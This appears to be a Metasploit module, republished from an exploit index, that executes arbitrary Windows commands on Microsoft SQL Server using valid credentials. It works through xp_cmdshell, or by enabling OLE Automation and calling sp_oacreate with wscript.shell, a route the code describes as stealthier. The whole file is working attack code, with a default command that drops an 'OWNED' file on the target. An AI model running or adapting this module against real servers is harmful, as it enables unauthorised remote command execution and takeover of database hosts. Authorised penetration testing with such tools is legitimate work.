Share
## https://sploitus.com/exploit?id=PACKETSTORM:180799
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::MSSQL  
include Msf::OptionalSession::MSSQL  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Microsoft SQL Server Command Execution',  
'Description' => %q{  
This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the  
sp_oacreate procedure (more opsec safe, no output, no temporary data table). A valid username and password is  
required to use this module.  
},  
'Author' =>  
[  
'tebo <tebo[at]attackresearch.com>',  
'arcc <pw[at]evait.de>'  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],  
[ 'URL', 'https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql'],  
],  
)  
)  
  
register_options([  
OptString.new('CMD', [ false, 'Command to execute', 'cmd.exe /c echo OWNED > C:\\owned.exe']),  
OptEnum.new('TECHNIQUE', [true, 'Technique to use for command execution', 'xp_cmdshell', ['xp_cmdshell', 'sp_oacreate']])  
])  
end  
  
def run  
if session  
set_mssql_session(session.client)  
else  
unless mssql_login_datastore  
print_error("Error with mssql_login call")  
info = self.mssql_client.initial_connection_info  
if info[:errors] && !info[:errors].empty?  
info[:errors].each do |err|  
print_error(err)  
end  
end  
return  
end  
end  
  
technique = datastore['TECHNIQUE']  
case technique  
when 'xp_cmdshell'  
begin  
mssql_xpcmdshell(datastore['CMD'], true)  
rescue RuntimeError  
print_status('Error while running "xp_cmdshell" method...retrying with "sp_oacreate" method')  
mssql_spoacreate  
end  
when 'sp_oacreate'  
mssql_spoacreate  
end  
end  
  
def mssql_spoacreate  
doprint = datastore['VERBOSE']  
print_status('Enabling advanced options and ole automation procedures.')  
mssql_query("EXEC sp_configure 'show advanced options', 1; RECONFIGURE;", doprint)  
mssql_query("EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;", doprint)  
print_good('Executing command using sp_oacreate. No output will be displayed.')  
mssql_query("DECLARE @mssql INT; EXEC sp_oacreate 'wscript.shell',@mssql OUTPUT; EXEC sp_oamethod @mssql, 'run', null, '#{datastore['CMD']}';", doprint)  
end  
end